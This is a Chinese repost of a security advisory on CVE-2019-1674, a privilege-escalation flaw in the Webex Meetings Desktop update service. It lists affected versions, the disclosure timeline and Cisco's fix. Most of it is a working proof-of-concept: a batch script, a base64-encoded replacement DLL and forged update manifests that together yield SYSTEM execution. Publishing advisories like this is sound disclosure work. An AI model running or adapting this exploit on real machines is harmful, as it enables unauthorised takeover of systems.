内容简介:概述Cisco的WebEx会议系统是一个视频会议和在线会议的平台,支持清晰的音频和视频沟通,同时能够轻松实现屏幕共享。根据其官方的介绍,这个平台“能帮助用户忘记技术,专注于最重要的事情”。在Cisco WebEx Meeting桌面版本的更新服务中存在一个漏洞,导致Windows版本的应用程序可以允许本地攻击者实现权限提升。受漏洞影响版本
概述
Cisco的WebEx会议系统是一个视频会议和在线会议的平台,支持清晰的音频和视频沟通,同时能够轻松实现屏幕共享。根据其官方的介绍,这个平台“能帮助用户忘记技术,专注于最重要的事情”。在Cisco WebEx Meeting桌面版本的更新服务中存在一个漏洞,导致Windows版本的应用程序可以允许本地攻击者实现权限提升。
受漏洞影响版本
·Cisco Webex Meetings Desktop App v33.6.4.15
· Cisco Webex Meetings Desktop App v33.6.5.2
· Cisco Webex Meetings Desktop App v33.7.0.694
· Cisco Webex Meetings Desktop App v33.7.1.15
· Cisco Webex Meetings Desktop App v33.7.2.24
· Cisco Webex Meetings Desktop App v33.7.3.7
· Cisco Webex Meetings Desktop App v33.8.0.779
· Cisco Webex Meetings Desktop App v33.8.1.13
· Cisco Webex Meetings Desktop App v33.8.2.7
旧版本可能同样受到该漏洞的影响,但目前未对旧版本进行过检查。
漏洞详情
Cisco Webex Meetings桌面应用程序(Windows版本)的更新服务无法正确验证新文件的版本号。不具有特权的本地攻击者可以通过使用精心设计的参数和文件夹调用更新服务命令来利用此漏洞。这将允许攻击者使用SYSTEM用户权限运行任意命令。
要利用此漏洞,攻击者必须首先将atgpcdec.7z复制到一个本地攻击者控制(Controller)文件夹中,然后将其重命名为atgpcdec.7z。随后,攻击者需要将先前版本的ptUpdate.exe文件压缩成7z文件并复制到控制文件夹中。与此同时,恶意DLL文件也必须放在同一个文件夹中,其名称为vcruntime140.dll,需要压缩为vcruntime140.7z。最后,还应在控制文件夹中为更新的二进制文件(ptUpdate.exe)提供ptUpdate.xml文件,从而使应用程序将我们的文件视为一个正常的更新。
要获取权限,攻击者必须使用命令行启动服务:
sc start webexservice WebexService 1 989898 "attacker-controlled-path"
概念证明
下面的概念证明将执行两步攻击,因为从33.8.x版本开始,应用程序会强制检查所有下载的二进制文件的签名。这两步攻击适用于所有提到的易受攻击的软件包。需要注意的是,在进行概念证明的过程中,还需要以前版本的ptUpdate.exe可执行文件。在第一步中,需要3307.1.1811.1500;在第二步中,需要3306.4.1811.1600。如果目标版本低于33.8.x,那么实际只需要进行第二步。
批处理文件如下:
/----- @echo off REM Contents of PoC.bat REM REM This batch file will exploit CVE-2019-1674 REM REM First, it will copy the atgpcdec.dll file from the installation REM folder to the current folder as atgpcdec.7z. Then, it will backup REM ptUpdate.exe and vcruntime140.dll files from the installation folder REM in the current folder, adding .bak to their names. Keep in mind that REM those files will be replaced (especially, vcruntime140.dll) and if REM not restored, will render the application useless. REM REM The executable ptUpdate.exe version 3307.1.1811.1500 must be REM compressed as ptUpdate0.7z and present in the current folder. REM The executable ptUpdate.exe version 3306.4.1811.1600 must be REM compressed as ptUpdate1.7z and present in the current folder. REM Both can be generated using 7zip GUI and compressing as 7z, with REM normal compression level and LZMA compression method. REM Another way is to compress both files using the command line app: REM REM 7z.exe a ptUpdate0.7z ptUpdate.exe -m0=BCJ -m1=LZMA:d=21 REM REM ptUpdate0.xml file will be used in the first stage of the attack. It REM will be renamed to ptUpdate.xml. Make sure to check and adjust (if REM necessary) the "Size" and "PackagedSize" values of the xml, to the REM ptUpdate0.7z ones. ptUpdate0.7z will be renamed to ptUpdate.7z. Then REM the update service will be started. REM REM The batch will wait until the process (ptUpdate.exe) finishes REM REM After the first stage is completeted, it will rename ptUpdate.7z REM back to ptUpdate0.7z, and ptUpdate.xml to ptUpdate0.xml. REM REM Now, ptUpdate1.xml file will be used in the second stage of the REM attack. It will be renamed to ptUpdate.xml. Also, ptUpdate1.7z will REM be renamed to ptUpdate.7z. Remember to check and adjust (if REM necessary) the "Size" and "PackagedSize" values of the xml, to the REM ptUpdate1.7z ones. Out "malicious" DLL will be generated using REM certutil.exe and named vcruntime140.7z. It's a simple dll that will REM execute notepad.exe on load and that has the same exported functions REM as the original. The update service will be started again. REM REM The batch will wait until the process (ptUpdate.exe) finishes REM REM Once finished, it will print that the attack is done and wait for a REM key press. You should see a notepad.exe (2, in fact) with SYSTEM REM user privileges running. REM REM After a key is pressed, the batch will finish removing atgpcdec.7z REM and vcruntime140.7z. Also it will rename ptUpdate.7z back to REM ptUpdate1.7z, and ptUpdate.xml to ptUpdate1.xml. :CheckOS IF EXIST "%PROGRAMFILES(X86)%" (GOTO 64BIT) ELSE (GOTO 32BIT) :64BIT copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\atgpcdec.dll" atgpcdec.7z copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\ptUpdate.exe" ptUpdate.exe.bak copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\vcruntime140.dll" vcruntime140.dll.bak GOTO END :32BIT copy "%PROGRAMFILES%\Webex\Webex\Applications\atgpcdec.dll" atgpcdec.7z copy "%PROGRAMFILES%\Webex\Webex\Applications\ptUpdate.exe" ptUpdate.exe.bak copy "%PROGRAMFILES%\Webex\Webex\Applications\vcruntime140.dll" vcruntime140.dll.bak GOTO END :END ren ptUpdate0.xml ptUpdate.xml ren ptUpdate0.7z ptUpdate.7z SET mypath=%~dp0 sc start webexservice WebexService 1 989898 %mypath:~0,-1% ECHO Waiting 3 seconds until ptUpdate.exe starts Timeout /T 3 /Nobreak :LOOP1 tasklist | find /i "ptUpdate" >nul 2>&1 IF ERRORLEVEL 1 ( GOTO CONTINUE1 ) ELSE ( ECHO ptUpdate.exe is still running Timeout /T 1 /Nobreak GOTO LOOP1 ) :CONTINUE1 ren ptUpdate.xml ptUpdate0.xml ren ptUpdate.7z ptUpdate0.7z ren ptUpdate1.xml ptUpdate.xml ren ptUpdate1.7z ptUpdate.7z echo N3q8ryccAARIz/fVRwYAAAAAAAB6AAAAAAAAANcfWYEAJpaOcAAX9+wFu+r0/5QBL0TuTr0Jkm3dgTnz3Weoe6NfFfEa/Y28zsBB2HEdPWzlugty+IIM4hglhy/h80OeyYw5CMe7jUK77wLPQMC9wwpT+oLYVDSuOK/v2WNuOLCpU3qtGSO+2sIFpGixpKQvLykpGOZUMczuRNNr/8Ps1lApsqe0ERm7gPGyiMqJBOCOVTC85lKIa2Cmc > dll.txt echo scrjgqKPPNmbXvscJWxmvv4NtC3mLQ1KuXYBSZXmFp8dR+ZDy5znkGG/C3w0T76c4wRCfOk+/myji9luDzO2OOwp8wgpN1QeGsA4+kaZwKYTisIvPegsI2joDsLAomIh2ToXENtcOA9/11kkJy4ColEdqlXxwSW2u45ajuNDs0aAE9nbz4AWXtv/VPfc4fn3Q+mN7FTmaDUr8dxZ5V05IafOO2qTgdSHPemTasMSqYLbzA8iaxBZimokw >> dll.txt echo zyzr3fwZIci+Ewzq5BnNXk+lvA30xCUYdvQuMCGkxBozk9Ec0kQ/SUixz77Nc9SbJnm0Hncff3QRRlU9ciqc6cYkQ2Cm+/dWkyDgJU+sxT9VGV+WVwNK85Q6zpPWLeVRYtk9UkxKHF0aXf3l/OgfQqtz0WSR94AF+Z9AiblDy0zOreSW8PhFbu0hfAgY1pMNC5gPNJiJ3OGwT/cLEhBPusvpfcLP3V0BwXx04T+5R7d5Rw9xWExdfCzGb >> dll.txt echo Mgyijdf5nP7fv9e5V0KO8kKrGVofstVIN8FTQSMeRGYRdv9WyuLRFWbArCL86HMo5NYEwFinlqCGqnY8hZcDMPe89q1xoNlVDmDtLC+AZqEkPKuqStllzKH7qQDg7Ahe6AMtGjaT2NptL2bSBYlkfn+1iiMt5cC/inZAoZoreSpDbGb4HRcOVce7ZKeiBAFpEzM0bEXAxnbLNO0pHm0bYCftbOkffJap3m79V+Dj4t0NPgwbhYKUqk1Hi >> dll.txt echo /9ebVE+IIsUlFFggilCy7BmIh3MF3Gmuhr7QLK37zV72LA0/tuDXXTWP/0EJEQ3F/v1+hSj/+HMwUBFL8xsghBfOXTpmBG6cUxK2YOwXvs/ntja2a7SWwppxtWgr4n/pxEdeezoBGl1sTZ9aIwSlu1mMehS5RYoyiSKnQfgLMsIYLqjZtc2DjUdSZDutZgC91axMjIEQ8kDIBp8dbuX4MpzNYe65OrKG/u76aemvcQ/R1QAwgTopuWgqO >> dll.txt echo tJ7LIkRv406u+Qs2d5KA9+IplFV7ZL9w1zXTDTFqATROK0IKtY2MPaP5Ia0d0UFizj0I7OZSeDtZXPohMxi01xMLyqCXIQ4vaJGVneNi1SyxAJ2hV92+5sxBCOlQ+d4w19k6iJA/siz1+V0FnIrN6csCMaW6yBnR6H+jHpm2sqXf3xyU8UkCRx09LmD1lcSB3sWdc3AnoG2ijb7lD6eBdCH2OlMWceeAfOMRm48MfYW6+AcZJm9wEQ9p8 >> dll.txt echo irxwCQuETvGMphqzbPxFJXErhoMTxlE57+/ZLBt8F/3XAaxQnmMucvSCFMYc6Z76OCbeotPfVnPhqL+torsEaph6DFzcw3dWuFrekbLnVVFKmM/QyeZVLS18u5lY1tGRyfAUCyhPIPJvUcXFKuDYHmdT/bOnF1B/xexvtY8boRhcKiNg4JBluTMbamdoktvfWvIVGUz2m50yA0dNN06yebHietxA+IwM0zfNbqpNWJjOItsi6/27j1mE7 >> dll.txt echo WCgPS5tetN44WkYD28Bm+LmHwz4lbPVjAIcgZBv0OtAXJsWMUtN8Bc2z9+fVSqc7pCHGCRnYDyKm8QhcV8hU4I/M4hSN+BWYn2jGJqc42lcaMzfXrySCnF4dAtIiE1HzAwmwWAqjlVkZdFiIuQ1m+pdbx2Ipji5piYRAJtykwO0H5JThzAzJGObOMCAenaKgvgtwF97iFdBZHxuSz+3DcYF6gQupm/BxNd35l6qj19sN2qixeGJ7rQapV >> dll.txt echo DJLTM5KMPdSItBNJSLLp9fuObcufi/6MBif28vemivzaWtalocJxX/MJni8PfdLYn/rLJQXmpq4Qm7z6N7FlPLtelATkMAZZ2ofaLFeBvIKzymBqtsxQAb63b+MowQvOkGAesT5JNXhoRqzOoATB9I/O7xIZu30SZwWdW85DX2MNAeB/DgzLt/c7U9A2D5vIgAEEBgABCYZHAAcLAQACIwMBAQVdABgAAAQDAwEDAQAMmACYAAAICgGcR >> dll.txt echo dWGAAAFARkLAAAAAAAAAAAAAAARIwB2AGMAcgB1AG4AdABpAG0AZQAxADQAMAAuAGQAbABsAAAAGQAUCgEAkBJyInaL1AEVBgEAIAAAAAAA >> dll.txt certutil -decode dll.txt vcruntime140.7z del dll.txt SET mypath=%~dp0 sc start webexservice WebexService 1 989898 %mypath:~0,-1% ECHO Waiting 3 seconds until ptUpdate.exe starts Timeout /T 3 /Nobreak :LOOP2 tasklist | find /i "ptUpdate" >nul 2>&1 IF ERRORLEVEL 1 ( GOTO CONTINUE2 ) ELSE ( ECHO ptUpdate.exe is still running Timeout /T 1 /Nobreak GOTO LOOP2 ) :CONTINUE2 ECHO Attack done! pause ren ptUpdate.xml ptUpdate1.xml ren ptUpdate.7z ptUpdate1.7z del atgpcdec.7z del vcruntime140.7z -----/
ptUpdate0.xml文件如下:
/----- <?xml version="1.0"?> <serv:message xmlns:serv="http://www.webex.com/schemas/2002/06/service" xmlns:com="http://www.webex.com/schemas/2002/06/common" xmlns:use="http://www.webex.com/schemas/2002/06/service/user"> <serv:header></serv:header> <serv:body> <serv:bodyContent xsi:type="use:getUpdateResponse" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <UpdateVersionNumber>33.8.3</UpdateVersionNumber> <BuildNumber>33.8.3-24</BuildNumber> <ExternalVersionNumber>33.8.3.24</ExternalVersionNumber> <GPCINI>self/gpc.php</GPCINI> <ReleaseDate>February 2017</ReleaseDate> <Description>WebEx Productivity Tools 33.8.3</Description> <MsiLocation>msi/ptools.msi</MsiLocation> <UpdateFormat>binary</UpdateFormat> <ReleaseTrain>T32</ReleaseTrain> <Location>$dummy/upgradeserver/client/ptool/33.8.3</Location> <ControlOption>0</ControlOption> <WBSVERSION>33</WBSVERSION> <Server>myCompany.webex.com</Server> <UserName><a href="/cdn-cgi/l/email-protection" data-cfemail="e6aba5adb59f95a7b4a68b9fa5898b9687889fc885898b">[email protected]</a></UserName> <DownloadSize>22496333</DownloadSize> <VersionURL/> <FileInfo> <SectionName>Installation</SectionName> <PackedName>ptupdate.7z</PackedName> <PackedNameL10N>ptupdate.7z</PackedNameL10N> <OrigianlName>ptupdate.exe</OrigianlName> <Version>3307,1,1811,1500</Version> <Size>1985592</Size> <PackagedSize>610752</PackagedSize> <CheckMethod>1</CheckMethod> <CouldIgnore>1</CouldIgnore> <NeedDownLoad>1</NeedDownLoad> </FileInfo> <Tools> <UseEmailType/> <Outlook>0</Outlook> <Notes>0</Notes> <UseWebExWithOffice>1</UseWebExWithOffice> <Excel>0</Excel> <PowerPoint>0</PowerPoint> <Word>0</Word> <IEShortCut>1</IEShortCut> <IERightMenu>0</IERightMenu> <UseWebExWithIM>1</UseWebExWithIM> <AOL>0</AOL> <Sametime>0</Sametime> <WindowsMessenger>0</WindowsMessenger> <Yahoo>0</Yahoo> <Skype>0</Skype> <GoogleTalk>0</GoogleTalk> <Firefox/> <IPPhone>1</IPPhone> </Tools> </serv:bodyContent> </serv:body> </serv:message> -----/
ptUpdate1.xml文件如下:
/----- <?xml version="1.0"?> <serv:message xmlns:serv="http://www.webex.com/schemas/2002/06/service" xmlns:com="http://www.webex.com/schemas/2002/06/common" xmlns:use="http://www.webex.com/schemas/2002/06/service/user"> <serv:header> </serv:header> <serv:body> <serv:bodyContent xsi:type="use:getUpdateResponse" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <UpdateVersionNumber>33.8.4</UpdateVersionNumber> <BuildNumber>33.8.4-24</BuildNumber> <ExternalVersionNumber>33.8.4.24</ExternalVersionNumber> <GPCINI>self/gpc.php</GPCINI> <ReleaseDate>February 2017</ReleaseDate> <Description>WebEx Productivity Tools 33.8.4</Description> <MsiLocation>msi/ptools.msi</MsiLocation> <UpdateFormat>binary</UpdateFormat> <ReleaseTrain>T32</ReleaseTrain> <Location>$dummy/upgradeserver/client/ptool/33.8.4</Location> <ControlOption>0</ControlOption> <WBSVERSION>33</WBSVERSION> <Server>myCompany.webex.com</Server> <UserName><a href="/cdn-cgi/l/email-protection" data-cfemail="3d707e766e444e7c6f7d50447e52504d5c5344135e5250">[email protected]</a></UserName> <DownloadSize>22496333</DownloadSize> <VersionURL/> <FileInfo> <SectionName>Common</SectionName> <PackedName>vcruntime140.7z</PackedName> <PackedNameL10N>vcruntime140.7z</PackedNameL10N> <OrigianlName>vcruntime140.dll</OrigianlName> <Version>14,14,26405,0</Version> <Size>6144</Size> <PackagedSize>1761</PackagedSize> <CheckMethod>1</CheckMethod> <CouldIgnore>1</CouldIgnore> <NeedDownLoad>1</NeedDownLoad> </FileInfo> <FileInfo> <SectionName>Installation</SectionName> <PackedName>ptupdate.7z</PackedName> <PackedNameL10N>ptupdate.7z</PackedNameL10N> <OrigianlName>ptupdate.exe</OrigianlName> <Version>3306,4,1811,1600</Version> <Size>1992760</Size> <PackagedSize>611786</PackagedSize> <CheckMethod>1</CheckMethod> <CouldIgnore>1</CouldIgnore> <NeedDownLoad>1</NeedDownLoad> </FileInfo> <Tools> <UseEmailType/> <Outlook>0</Outlook> <Notes>0</Notes> <UseWebExWithOffice>1</UseWebExWithOffice> <Excel>0</Excel> <PowerPoint>0</PowerPoint> <Word>0</Word> <IEShortCut>1</IEShortCut> <IERightMenu>0</IERightMenu> <UseWebExWithIM>1</UseWebExWithIM> <AOL>0</AOL> <Sametime>0</Sametime> <WindowsMessenger>0</WindowsMessenger> <Yahoo>0</Yahoo> <Skype>0</Skype> <GoogleTalk>0</GoogleTalk> <Firefox/> <IPPhone>1</IPPhone> </Tools> </serv:bodyContent> </serv:body> </serv:message> -----/
时间节点
· 2018年12月4日 SecureAuth向Cisco PSIRT发送通知
· 2018年12月5日 Cisco接收漏洞,并告知将进行分析
· 2018年12月7日 Cisco反馈正在针对漏洞制定修复计划
· 2018年12月7日 SecureAuth感谢Cisco更新漏洞进展
· 2018年12月10日 Cisco通知SecureAuth,预计在2月底前发布更新
· 2018年12月10日 SecureAuth感谢Cisco更新漏洞进展
· 2019年1月15日 SecureAuth要求Cisco提供更新
· 2019年1月22日 SecureAuth再次要求Cisco提供更新
· 2019年1月22日 Cisco反馈说将在2月发布修复程序
· 2019年2月11日 Cisco确认2月27日为漏洞披露日期
· 2019年2月27日 发布本文章
厂商回应
Cisco表示该漏洞已经在33.6.6和33.9.1版本的Cisco Webex会议桌面应用中实现修复。此外,Cisco还发布了以下建议:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-wmda-cmdinj
贡献
此漏洞由SecureAuth的Marcos Accossatto发现并研究。此通报的发布由SecureAuth Advisories Team的Leandro Cuozzo协调。
以上所述就是小编给大家介绍的《Cisco WebEx会议系统本地权限提升漏洞分析(CVE-2019-1674)》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:- Apache OpenMeetings 6.0.0 发布,开源线上会议系统
- Apache OpenMeetings 3.3.2 发布,视频会议系统
- Apache OpenMeetings 4.0.2 发布,视频会议系统
- Apache OpenMeetings 4.0.3 发布,视频会议系统
- Apache OpenMeetings 4.0.4 发布,视频会议系统
- Apache OpenMeetings 4.0.6 发布,视频会议系统
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。